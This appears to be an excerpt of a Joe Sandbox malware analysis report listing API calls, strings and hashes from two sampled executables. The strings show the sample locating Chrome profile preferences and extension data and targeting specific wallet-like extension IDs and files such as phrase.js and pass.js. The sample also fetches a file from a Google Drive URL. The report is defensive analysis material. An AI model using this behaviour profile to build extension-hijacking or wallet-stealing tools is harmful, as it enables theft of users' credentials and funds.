Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: Bad unicode escape sequence in string: four digits expected.$Bad unicode escape sequence in string: hexadecimal digit expected.
API String ID: 3668304517-3825735986
Opcode ID: 0c2e9f55a7f65a032be0d18626717429307942a2f3de7192f147379158a827ed
Instruction ID: 4204eb6d4d1ca201a738f648c56df80e25d8b66102563967ebf3ee5b37039ddc
Opcode Fuzzy Hash: 0c2e9f55a7f65a032be0d18626717429307942a2f3de7192f147379158a827ed
Instruction Fuzzy Hash: E4411493E1C68541EA50FE26E4026BD2351FB957E4F409331FE6DE36DAEE2CE1819700

Function 00007FF643F77D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF643F77E27
GetLastError.KERNEL32 ref: 00007FF643F77E49

Strings

U, xrefs: 00007FF643F77DD3

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 26407c493de7ae598b61e49771dd347e6341eebb60b6796b06b6e28fe12133ed
Instruction ID: b4058b2966a209e6cd2df6e1f439c1f8b9ff2a19160a2984c7edf564f834fea5
Opcode Fuzzy Hash: 26407c493de7ae598b61e49771dd347e6341eebb60b6796b06b6e28fe12133ed
Instruction Fuzzy Hash: DD41A062B2CA4282DBA0BF25E8467BA67A0FB88784F854031EE4DD7794EF7CD445D740

Function 00007FF643F8CF80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F8CFE0
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF643F8D016

Strings

Unknown exception, xrefs: 00007FF643F8CF8E

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: __std_exception_destroy_invalid_parameter_noinfo_noreturn
String ID: Unknown exception
API String ID: 729085983-410509341
Opcode ID: 4760260a9b486b8840c271b93fb85519dd309387c3402d518311e1abf3e79c7b
Instruction ID: 392b18b8555a4f45085f6d6a2a502e2444faec63dbeb9aec88456f9c9e2f7990
Opcode Fuzzy Hash: 4760260a9b486b8840c271b93fb85519dd309387c3402d518311e1abf3e79c7b
Instruction Fuzzy Hash: 7911A562A1EB4585EB48BF25E4463AC3390DF80BA4F105631D91C9B7DAEF7CE484E340

Function 00007FF643F22C90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F22CA7
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF643F22CE6

Part of subcall function 00007FF643F5F23C: _Yarn.LIBCPMT ref: 00007FF643F5F26A

Strings

bad locale name, xrefs: 00007FF643F22CFA

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
String ID: bad locale name
API String ID: 1838369231-1405518554
Opcode ID: 32b7ae8dc5c7a4dabcb2d6b565ab7b2f9c6359523e4baa40e4bebb780e0dcbca
Instruction ID: 3410ca80eb5c27f33c5971cba47a559f7262476237881f976a211c5e400bbd71
Opcode Fuzzy Hash: 32b7ae8dc5c7a4dabcb2d6b565ab7b2f9c6359523e4baa40e4bebb780e0dcbca
Instruction Fuzzy Hash: 0A01AD23109BC1CAC784FF75A88119877A5FB28B88B289139CA8CC375AEF38C590C340

Function 00007FF643F649C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF643F5EEE6), ref: 00007FF643F64A10
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF643F5EEE6), ref: 00007FF643F64A51

Strings

csm, xrefs: 00007FF643F64A3E

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 3a651beb4bf27f5407259cea30834cbdef90a895a548db86fc01e64e268f21f8
Instruction ID: 57078518fd60def8c19f5cfee88bb255f82b62d0c9384661b9ee5476fed58ce9
Opcode Fuzzy Hash: 3a651beb4bf27f5407259cea30834cbdef90a895a548db86fc01e64e268f21f8
Instruction Fuzzy Hash: 7711603261CB8182EBA1AF15F44126A77E1FB88B84F184230DE8C57798DF3CC552D700

Function 00007FF643F8BC33 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F8BC99
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF643F8BCCF

Strings

Unknown exception, xrefs: 00007FF643F8BC41

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: __std_exception_destroy_invalid_parameter_noinfo_noreturn
String ID: Unknown exception
API String ID: 729085983-410509341
Opcode ID: 7a46c075ae1c8417c0b4ef7169ee8afa7c9564350e8857d7f7ba50c4cd34cae0
Instruction ID: e683c3c1f04f5d8726dfbac9f58a44f9d3b9efeda2bb4f68fa0d66b0581b2d72
Opcode Fuzzy Hash: 7a46c075ae1c8417c0b4ef7169ee8afa7c9564350e8857d7f7ba50c4cd34cae0
Instruction Fuzzy Hash: 2711A172A29B8684EB59BF25E44A3EC3390EB41BA4F004231CA2C5B7D6DF3CD980D340

Function 00007FF643F42BC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF643F42BDE

Part of subcall function 00007FF643F5E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF643F23F96), ref: 00007FF643F5E0C6

Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23B25
Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23BCA

Strings

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip, xrefs: 00007FF643F42BC6
J, xrefs: 00007FF643F42BCD

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: __std_fs_convert_narrow_to_wide$ApisFile__std_fs_code_page
String ID: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip$J
API String ID: 1377543553-1822051254
Opcode ID: 562919172af5b9e87f5682eb6a0a24944c2d8dc34fa2571c2ff8a2ccba6cf4ea
Instruction ID: e19d4a9bef4089972d0d5ef0da839144518e6d2c66df5a3cc4b6ecccad325b88
Opcode Fuzzy Hash: 562919172af5b9e87f5682eb6a0a24944c2d8dc34fa2571c2ff8a2ccba6cf4ea
Instruction Fuzzy Hash: 78E04F56A187C6C2EA60AB14A4023AAA364FB9D308F040231EECC577A5EF3CD2858B45

Function 00007FF643F42C10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF643F42C2E

Part of subcall function 00007FF643F5E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF643F23F96), ref: 00007FF643F5E0C6

Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23B25
Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23BCA

Strings

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, xrefs: 00007FF643F42C16
G, xrefs: 00007FF643F42C1D

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: __std_fs_convert_narrow_to_wide$ApisFile__std_fs_code_page
String ID: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$G
API String ID: 1377543553-4099582714
Opcode ID: c8c0632f238214065625dfbc26c946da351fe81e8c674869c76d141565dec898
Instruction ID: e510c25d93d0edf93775ff18b492281507c7f5ba115efd78789eeef998be2a3f
Opcode Fuzzy Hash: c8c0632f238214065625dfbc26c946da351fe81e8c674869c76d141565dec898
Instruction Fuzzy Hash: B0E0485591C7C5C1D660AB14B4023A9E354FB9C308F040231DFCC57765DF3CD2858B44

Analysis Process: AzVRM7c.exePID: 1528, Parent PID: 7820COMMON

Execution Graph

Execution Coverage:	12%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	2000
Total number of Limit Nodes:	47

Executed Functions

Function 00007FF68456E790 Relevance: 96.6, APIs: 27, Strings: 27, Instructions: 2093COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF68456E910
__std_fs_code_page.LIBCPMT ref: 00007FF68456EB1B

Part of subcall function 00007FF6845860E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6845861F2
Part of subcall function 00007FF6845860E0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6845861F8

Part of subcall function 00007FF6845A2A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6845A2A68
Part of subcall function 00007FF6845A2A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6845A2A6E

__std_fs_code_page.LIBCPMT ref: 00007FF68456EF46

Part of subcall function 00007FF68459E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF684563F96), ref: 00007FF68459E0C6

Part of subcall function 00007FF684563AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF684563B25
Part of subcall function 00007FF684563AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF684563BCA

__std_fs_code_page.LIBCPMT ref: 00007FF68456F01E
__std_fs_code_page.LIBCPMT ref: 00007FF68456F9F6
__std_fs_code_page.LIBCPMT ref: 00007FF68457062E
__std_fs_code_page.LIBCPMT ref: 00007FF68457074D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570E29
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570E2F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570E52
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570E6F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570ECA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570ED0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570ED6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570F37
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570F3D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570F43
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570F49
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570F6C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570FA6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570FBC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570FC2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570FD0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570FD6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570FDC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684570FE2

Strings

Warning: Pinned extension is not a string, skipping., xrefs: 00007FF68456F826
macs, xrefs: 00007FF68456FE61
profile, xrefs: 00007FF68456F322, 00007FF68456F33F, 00007FF68456F35D, 00007FF68456F384
\Secure Preferences, xrefs: 00007FF68456EC62, 00007FF684570D1A
ios_base::badbit set, xrefs: 00007FF684570EE0
status, xrefs: 00007FF684570E78, 00007FF684570FAF
No extensions found in preferences., xrefs: 00007FF68456F881
\Extensions, xrefs: 00007FF68456EDD0
extensions, xrefs: 00007FF68456F5DC, 00007FF68456F5F9, 00007FF68456F617, 00007FF68456F63E, 00007FF68456F674, 00007FF68456F6C6, 00007FF68456F6E3, 00007FF68456F701, 00007FF68456FBE1, 00007FF68456FEDB
No pinned extensions found or 'pinned_extensions' is not an array., xrefs: 00007FF68456F863
settings, xrefs: 00007FF68456FC52, 00007FF68456FF55
Chrome User Data directory not found., xrefs: 00007FF68456EA1E
\AppData\Local\Google\Chrome\User Data, xrefs: 00007FF68456E82D
File parse failed, xrefs: 00007FF68456F2FF
exists, xrefs: 00007FF684570E45, 00007FF684570EBE, 00007FF684570F5F, 00007FF684570F82
Q]1y, xrefs: 00007FF68456E7AA
, xrefs: 00007FF6845709EE
name, xrefs: 00007FF68456F371, 00007FF68456F398
directory_iterator::directory_iterator, xrefs: 00007FF684570E62, 00007FF684570F99
ios_base::failbit set, xrefs: 00007FF684570EEB
file_size, xrefs: 00007FF684570EA1
C:\Users\, xrefs: 00007FF68456E812
ios_base::eofbit set, xrefs: 00007FF684570EF2
\Preferences, xrefs: 00007FF68456EC5B, 00007FF684570D21
pinned_extensions, xrefs: 00007FF68456F718, 00007FF68456F72F, 00007FF68456F755
developer_mode, xrefs: 00007FF68456F661, 00007FF68456F697
protection, xrefs: 00007FF68456FDEA

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$Concurrency::cancel_current_task$__std_fs_convert_narrow_to_wide$ApisFile
String ID: $C:\Users\$Chrome User Data directory not found.$File parse failed$No extensions found in preferences.$No pinned extensions found or 'pinned_extensions' is not an array.$Q]1y$Warning: Pinned extension is not a string, skipping.$\AppData\Local\Google\Chrome\User Data$\Extensions$\Preferences$\Secure Preferences$developer_mode$directory_iterator::directory_iterator$exists$extensions$file_size$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$macs$name$pinned_extensions$profile$protection$settings$status
API String ID: 1036029176-1239843877
Opcode ID: 08ec73f9bdbbd47800101681472aaa64930d19fbe39ed722f6622a5bd8c198fe
Instruction ID: 848374c199c323296f4b9a51c1303c21b329193749893f3fc2776ca862302b48
Opcode Fuzzy Hash: 08ec73f9bdbbd47800101681472aaa64930d19fbe39ed722f6622a5bd8c198fe
Instruction Fuzzy Hash: CA237262A1CBC2C2EA21DB14E4D43EE6365FF85B84F44813ADA8D87A99EF7CD544C701

Function 00007FF68456B600 Relevance: 87.0, APIs: 30, Strings: 19, Instructions: 1276COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68456A810: __std_fs_code_page.LIBCPMT ref: 00007FF68456A883

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456C99D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456C9A3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456C9A9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456C9AF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456C9BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456C9C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456C9C7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456C9D3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456C9D9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456C9DF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456C9EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456C9F1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456C9F7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA03
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA09
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA0F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA1B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA21
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA27
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA33
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA39
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA3F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA4B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA51
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA57
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA63
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA69
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA6F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA7B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456CA81

Strings

efbglgofoippbgcjepnhiblaibcnclgk, xrefs: 00007FF68456BA90
Q]1y, xrefs: 00007FF68456B624
nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 00007FF68456C77B
\assets\js\script.js, xrefs: 00007FF68456BB44, 00007FF68456BEF6
egjidjbpglichdcondbcbdnbeeppgdph, xrefs: 00007FF68456BC65
\js\script.js, xrefs: 00007FF68456B792
\reset.js, xrefs: 00007FF68456C47D
\pass.js, xrefs: 00007FF68456B967
hifafgmccdpekplomjjkcfgodnhcellj, xrefs: 00007FF68456C017
fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00007FF68456BE42
\scripts\phrase.js, xrefs: 00007FF68456C0CB
aholpfdialjgjfhomihkjbmgjidlcdno, xrefs: 00007FF68456B6DE
hnfanknocfeofbddgcijnmhnfnkdnaad, xrefs: 00007FF68456C1F4
mcohilncbfahbmgdjkbpemcciiolgcge, xrefs: 00007FF68456C5A6
lpfcbjknijpeeillifnkikgncikgfhdo, xrefs: 00007FF68456C3C9
\popup.js, xrefs: 00007FF68456BD19, 00007FF68456C2A8
Directories found:, xrefs: 00007FF68456B652
\assets\js\popup.js, xrefs: 00007FF68456C65A, 00007FF68456C82F
bfnaelmomeimhlpmgjnjophhpkkoljpa, xrefs: 00007FF68456B8B3

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
String ID: Directories found:$Q]1y$\assets\js\popup.js$\assets\js\script.js$\js\script.js$\pass.js$\popup.js$\reset.js$\scripts\phrase.js$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
API String ID: 4261731725-2835809304
Opcode ID: eed29142c0b17473f8e06e9c831029cfc41bd86864cffae7e9f34e7c1f3a7299
Instruction ID: a09ac5d0e07f5ed33765ebecbf742f9828c66a17680ac72ba50dac5712f6ba93
Opcode Fuzzy Hash: eed29142c0b17473f8e06e9c831029cfc41bd86864cffae7e9f34e7c1f3a7299
Instruction Fuzzy Hash: BCD29D22F18B86C5FB00CB64D5903BD2362BF557A8F009639DA6C97ADADF78E184D341

Function 00007FF684566190 Relevance: 40.6, APIs: 12, Strings: 11, Instructions: 360
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET ref: 00007FF684566434
InternetOpenUrlA.WININET ref: 00007FF6845664D5
InternetReadFile.WININET ref: 00007FF684566593
InternetReadFile.WININET ref: 00007FF6845665CD
InternetCloseHandle.WININET ref: 00007FF6845665E3
InternetCloseHandle.WININET ref: 00007FF6845665EC
InternetCloseHandle.WININET ref: 00007FF6845666DA
InternetCloseHandle.WININET ref: 00007FF6845666E3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456674B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456675D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684566763
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684566769

Strings

&export=download, xrefs: 00007FF68456623B
Q]1y, xrefs: 00007FF6845661B1
InternetOpenUrl failed., xrefs: 00007FF6845664FB
File downloaded successfully and saved as , xrefs: 00007FF684566620
Failed to open file for writing., xrefs: 00007FF684566689
InternetOpen failed., xrefs: 00007FF68456645A
FileDownloader, xrefs: 00007FF68456642D
https://drive.google.com/uc?id=, xrefs: 00007FF684566223
DST: , xrefs: 00007FF6845663D0
URL: , xrefs: 00007FF68456634F
*, xrefs: 00007FF684566617

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: Internet$CloseHandle_invalid_parameter_noinfo_noreturn$FileOpenRead
String ID: &export=download$*$DST: $Failed to open file for writing.$File downloaded successfully and saved as $FileDownloader$InternetOpen failed.$InternetOpenUrl failed.$Q]1y$URL: $https://drive.google.com/uc?id=
API String ID: 1313048855-2496810775
Opcode ID: 4639291ec341a60a2cc4afd7a0e8c87ad7a9a4ea5c0def95dc1264ce19a52618
Instruction ID: 09dc59841d9d6fd026dc9dde618767b283a6be3a622977432e3f85cd8f26ee5a
Opcode Fuzzy Hash: 4639291ec341a60a2cc4afd7a0e8c87ad7a9a4ea5c0def95dc1264ce19a52618
Instruction Fuzzy Hash: 1EF19262F18B46C1EA10CB65E4943BD6361FF857A8F104239EA6D86BD9DF7CE481C702

Function 00007FF6845BE170 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6845BDD54: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6845BDD95
Part of subcall function 00007FF6845BDD54: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6845BDE13
Part of subcall function 00007FF6845BDD54: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6845BDE64

CreateFileW.KERNEL32 ref: 00007FF6845BE276
CreateFileW.KERNEL32 ref: 00007FF6845BE2C6
GetLastError.KERNEL32 ref: 00007FF6845BE2F6
GetFileType.KERNEL32 ref: 00007FF6845BE30B
GetLastError.KERNEL32 ref: 00007FF6845BE315
CloseHandle.KERNEL32 ref: 00007FF6845BE348
CloseHandle.KERNEL32 ref: 00007FF6845BE4AB
CreateFileW.KERNEL32 ref: 00007FF6845BE4E0
GetLastError.KERNEL32 ref: 00007FF6845BE4EF

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
